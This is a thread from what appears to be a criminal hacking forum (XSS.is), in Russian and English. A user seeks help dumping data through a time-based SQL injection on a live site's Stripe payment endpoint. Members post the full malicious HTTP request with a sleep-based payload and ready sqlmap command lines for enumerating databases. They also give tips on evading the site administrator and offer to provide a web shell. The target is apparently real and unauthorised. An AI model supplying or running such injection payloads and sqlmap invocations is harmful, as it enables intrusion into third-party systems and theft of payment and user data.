как я могу использовать это для сброса?
-
XSS.stack #1 – первый литературный журнал от юзеров форума
помогите с sql инъекцией
- Автор темы baztaxx
- Дата начала
Для сброса чего? Это time based sql injection пихай в sqlmap и все)
Post a full request.
Сохрани это в текстовый файл, а sqlmap натрави уже на этот файл
Хотя действие sqlmap может поднять админа с дивана и смотреть что там происходит, впринципе там окунь тебе подсказку дал, можно ручками проверить
- Автор темы
- Добавить закладку
- #6
POST /maker/stripe/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referrer:
Cookie: CAMPAIGN=kvs2g9o4d0fi89rit72kaj9650; 544ngdhajpg6hrid1vl07a4mnf-agile-crm-guid=486f8fab-8b54-4f24-9f2c-b6c5db6770fc; 544ngdhajpg6hrid1vl07a4mnf-agile-crm-session_id=96b2dc4b-aa8d-6825-0ffe-9728e547646b; 544ngdhajpg6hrid1vl07a4mnf-agile-crm-session_start_time=2; twk_idm_key=r_EHv1VoKl8ggdRtW8APZ; TawkConnectionTime=0; APPYREWARD=q9a1p7p5985jg2jvk4hdrp5125
Content-Length: 257
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Host:
Connection: Keep-alive
amount=0&campaign=1&session_admin_company=0'XOR(if(now()=sysdate()%2Csleep(6)%2C0))XOR'Z&session_continent=1&session_credit_fee=4111111111111111&session_language=EN&session_payment_fee=1&session_user_zoom_token=JCfUZQsq&user=d41d8cd98f00b204e9800998ecf8427e
- Автор темы
- Добавить закладку
- #7
i mean dumping data i put the link in sqlmap but its not working
Код:
sqlmap.py -u "https://site.com/maker/stripe/index.php" --data="amount=0&campaign=1&session_admin_company=0*&session_continent=1&session_credit_fee=4111111111111111&session_language=EN&session_payment_fee=1&session_user_zoom_token=JCfUZQsq&user=d41d8cd98f00b204e9800998ecf8427e" --dbs --dbms=MySQL --risk=3 --level=5 --random-agentTry this. If there are problems write here.
- Автор темы
- Добавить закладку
- #9
- Автор темы
- Добавить закладку
- #10
я отправил вам сайт в приват
Сохрани запрос в файл.
sqlmap -r ~/file --level=3 --risk=3 -p parametr --technique=BETQUS --batch
Может нужно попробовать --tamper --time-sec и какой там тип бд --dbms=
Почитай:
sqlmap -r ~/file --level=3 --risk=3 -p parametr --technique=BETQUS --batch
Может нужно попробовать --tamper --time-sec и какой там тип бд --dbms=
Почитай:
- Автор темы
- Добавить закладку
- #12
thank youSave the request to a file.
sqlmap -r ~/file --level=3 --risk=3 -p parametr --technique=BETQUS --batch
Maybe you need to try --tamper --time-sec and what type of database is there --dbms=
Read:
- Автор темы
- Добавить закладку
- #13
made a typo i think its working now
Код:
HTTP/1.1 200 OK
Date: Thu, 07 Jul 2022 12:24:41 GMT
Server: Apache/2.2.22
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Original-Content-Encoding: gzip
Content-Length: 10
NO SESSIONБез сессии уязвимость не будет работать...
- Автор темы
- Добавить закладку
- #15
как добавить сессию?
ну попробуй зарегистрироваться хотябы...ps: это раз такие дела полчасика подожди закину тебе шелл
- Автор темы
- Добавить закладку
- #17
a ok im noob with sqlmap
Тебе уже дали готовое решение сверху. Все там прекрасно работаетa ok im noob with sqlmap
Поражаюсь тому во скольких сферах ты функционируешь
Картошку настроил? А то я чет прое#ал твои сообщения в личке.Поражаюсь тому во скольких сферах ты функционируешь